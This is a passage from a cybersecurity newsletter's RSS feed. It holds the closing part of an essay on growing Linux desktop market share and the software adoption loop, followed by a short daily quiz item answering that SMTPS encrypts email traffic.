href="https://substackcdn.com/image/fetch/$s_!HOkI!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe5684efd-a75c-4db4-86a4-6e4077476019_1100x906.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!HOkI!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe5684efd-a75c-4db4-86a4-6e4077476019_1100x906.png 424w, https://substackcdn.com/image/fetch/$s_!HOkI!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe5684efd-a75c-4db4-86a4-6e4077476019_1100x906.png 848w, 
https://substackcdn.com/image/fetch/$s_!HOkI!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe5684efd-a75c-4db4-86a4-6e4077476019_1100x906.png 1272w, https://substackcdn.com/image/fetch/$s_!HOkI!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe5684efd-a75c-4db4-86a4-6e4077476019_1100x906.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!HOkI!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe5684efd-a75c-4db4-86a4-6e4077476019_1100x906.png" width="508" height="418.40727272727275" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/e5684efd-a75c-4db4-86a4-6e4077476019_1100x906.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:906,&quot;width&quot;:1100,&quot;resizeWidth&quot;:508,&quot;bytes&quot;:80412,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://emilianocybersec.substack.com/i/188885383?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe5684efd-a75c-4db4-86a4-6e4077476019_1100x906.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!HOkI!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe5684efd-a75c-4db4-86a4-6e4077476019_1100x906.png 424w, 
https://substackcdn.com/image/fetch/$s_!HOkI!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe5684efd-a75c-4db4-86a4-6e4077476019_1100x906.png 848w, https://substackcdn.com/image/fetch/$s_!HOkI!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe5684efd-a75c-4db4-86a4-6e4077476019_1100x906.png 1272w, https://substackcdn.com/image/fetch/$s_!HOkI!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe5684efd-a75c-4db4-86a4-6e4077476019_1100x906.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line 
x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>That said, the Linux software landscape is better for creative work than its reputation suggests. <strong>DaVinci Resolve</strong>, Blackmagic&#8217;s professional video editor used across film and television production, runs natively on Linux and is competitive with, arguably superior to, Premiere Pro in many workflows. <strong>Blender</strong>, the 3D creation suite used in professional VFX pipelines, is Linux-native and has seen rapid growth. <strong>Kdenlive</strong>, <strong>Audacity</strong>, <strong>GIMP</strong>, and the broader open-source creative stack are increasingly viable options for users who don&#8217;t already depend on Adobe. The honest story is that someone starting fresh in a creative field today has more Linux-compatible options than they did five years ago, but someone already embedded in the Adobe ecosystem has a much steeper switching cost.</p><p><strong>Hardware driver support</strong> has improved significantly, but it isn&#8217;t universal. NVIDIA&#8217;s proprietary drivers have improved on Linux but remain more complex to configure than on Windows. Peripheral support, especially gaming peripherals, can require workarounds.</p><div><hr></div><h2><strong>The <a href="https://en.wikipedia.org/wiki/Ouroboros#:~:text=The%20ouroboros%20(/%CB%8C%CA%8A%C9%99r%C9%99,been%20known%20to%20consume%20themselves.">Ouroboros</a> Problem And Why It Might Finally Be Breaking</strong></h2><p>There&#8217;s a structural argument that has kept Linux stuck for decades, and it&#8217;s worth naming directly because it&#8217;s the real mountain Linux needs to climb. The problem is a classic adoption loop: developers don&#8217;t build for Linux because Linux has too small a market share to justify the engineering cost. But Linux has too small a market share, partly because users who want to switch can&#8217;t find the tools they need there. 
The platform stays small because it&#8217;s small. Every time someone evaluated Linux seriously and found their industry software missing, their game incompatible, or their professional workflow unsupported, they went back to Windows, and the market share number stayed low enough that developers never had a reason to reconsider. This is the same dynamic that kept Linux gaming irrelevant for years. Why would studios port to Linux when Linux users accounted for only 1% of Steam users? And why would users switch to Linux when their games didn&#8217;t run there?</p><p>Valve broke that cycle in gaming by artificially solving the supply side with Proton, meaning developers didn&#8217;t need to do anything, and compatibility was still achieved. That&#8217;s a meaningful proof of concept. But for productivity software, enterprise tooling, and professional creative applications, there&#8217;s no equivalent compatibility layer that makes Adobe just work. The only thing that changes the calculus for those developers is market share.</p><p>This is exactly why the current growth moment matters more than the raw 4.7% number suggests. There&#8217;s a threshold somewhere between 5% and 10% of the desktop market share at which Linux stops being a rounding error and becomes a segment developers have to consciously decide to ignore. At 1-2%, ignoring Linux was the obvious default. At 5% and rising rapidly, it becomes a decision that requires justification. At 8-10%, it starts costing companies real money. The Steam data is instructive here. Once Linux gaming crossed 3% on Steam, the conversation in game development communities visibly shifted from &#8216;should we support Linux&#8217; to &#8216;can we afford not to?&#8217; Valve&#8217;s Deck Verified program created commercial pressure: a game without Deck certification is less visible in Steam&#8217;s storefront. That&#8217;s the market mechanism working.</p><p>The same logic will eventually apply to productivity software. 
If Linux desktop share reaches 6-8%, which current trajectories suggest is possible by 2027, the calculation for software vendors changes. Companies like Adobe, Autodesk, and others have already built cross-platform infrastructure for macOS support. The marginal engineering cost to extend that to Linux is lower than it was when their entire stack was Windows-native. What&#8217;s been missing is the demand signal. More users switching to Linux creates that signal, which attracts more software, which makes Linux a more viable destination for the next wave of switchers. The loop can run in reverse. It&#8217;s not guaranteed, and it won&#8217;t be fast. But for the first time in Linux&#8217;s desktop history, the growth rate is high enough that the question of critical mass is no longer purely hypothetical.</p><h2><strong>So, Is This Actually It?</strong></h2><p>The data argues something more nuanced than &#8216;the joke is dead&#8217; or &#8216;the joke lives on&#8217;. Linux desktop adoption is driven by a combination of genuine platform improvements and an unusually severe push from Windows. The US crossing 5% is meaningful, not because 5% is a world-conquering number, but because the growth rate to get there is unlike anything in Linux&#8217;s desktop history. What&#8217;s also different this time is the quality of growth. The Steam survey data showing SteamOS declining as a share of Linux gamers while desktop distributions rise suggests this isn&#8217;t just the Steam Deck inflate-the-numbers effect. People are choosing to install Linux on their machines. 
Developer adoption is creating an ecosystem effect: better documentation, more compatible software, and more hardware vendor attention.</p><p>The more useful question than &#8216;is this the year&#8217; is whether Linux has passed a threshold at which its growth becomes self-sustaining, where the installed base is large enough to attract software developers, hardware vendors, and enterprise support that, in turn, attract more users. The joke may not be dead. But it might be closer to a retirement announcement than a punchline.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!O0JT!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3c4d3d20-26c2-499f-abc6-bbc5ebe32f40_1024x608.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!O0JT!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3c4d3d20-26c2-499f-abc6-bbc5ebe32f40_1024x608.jpeg 424w, https://substackcdn.com/image/fetch/$s_!O0JT!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3c4d3d20-26c2-499f-abc6-bbc5ebe32f40_1024x608.jpeg 848w, https://substackcdn.com/image/fetch/$s_!O0JT!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3c4d3d20-26c2-499f-abc6-bbc5ebe32f40_1024x608.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!O0JT!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3c4d3d20-26c2-499f-abc6-bbc5ebe32f40_1024x608.jpeg 1456w" sizes="100vw"><img 
src="https://substackcdn.com/image/fetch/$s_!O0JT!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3c4d3d20-26c2-499f-abc6-bbc5ebe32f40_1024x608.jpeg" width="320" height="190" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/3c4d3d20-26c2-499f-abc6-bbc5ebe32f40_1024x608.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:608,&quot;width&quot;:1024,&quot;resizeWidth&quot;:320,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!O0JT!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3c4d3d20-26c2-499f-abc6-bbc5ebe32f40_1024x608.jpeg 424w, https://substackcdn.com/image/fetch/$s_!O0JT!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3c4d3d20-26c2-499f-abc6-bbc5ebe32f40_1024x608.jpeg 848w, https://substackcdn.com/image/fetch/$s_!O0JT!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3c4d3d20-26c2-499f-abc6-bbc5ebe32f40_1024x608.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!O0JT!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3c4d3d20-26c2-499f-abc6-bbc5ebe32f40_1024x608.jpeg 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><div><hr></div><p><em>Data sources: StatCounter Global Stats, US Digital Analytics Program, Steam Hardware &amp; Software 
Survey (Valve), Stack Overflow Developer Survey 2025, Bitsight, Zorin OS, NotebookCheck, WindowsCentral, WindowsLatest, GamingOnLinux</em></p>]]></content:encoded></item><item><title><![CDATA[Daily Cyber Quiz]]></title><description><![CDATA[Answer revealed tomorrow...]]></description><link>https://emilianocybersec.substack.com/p/daily-cyber-quiz-30b</link><guid isPermaLink="false">https://emilianocybersec.substack.com/p/daily-cyber-quiz-30b</guid><dc:creator><![CDATA[Emiliano L. 
Compassi]]></dc:creator><pubDate>Mon, 23 Feb 2026 14:02:50 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/ce2d80a0-80c6-4b78-a1e2-e23f1489db44_5760x3840.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="poll-embed" data-attrs="{&quot;id&quot;:453823}" data-component-name="PollToDOM"></div><p>Yesterday&#8217;s Answer: SMTPS (Simple Mail Transfer Protocol Secure)</p><ul><li><p>SMTPS uses SSL/TLS (Secure Sockets Layer/Transport Layer Security) to encrypt communication between the email client and server.</p></li></ul>]]></content:encoded></item></channel></rss>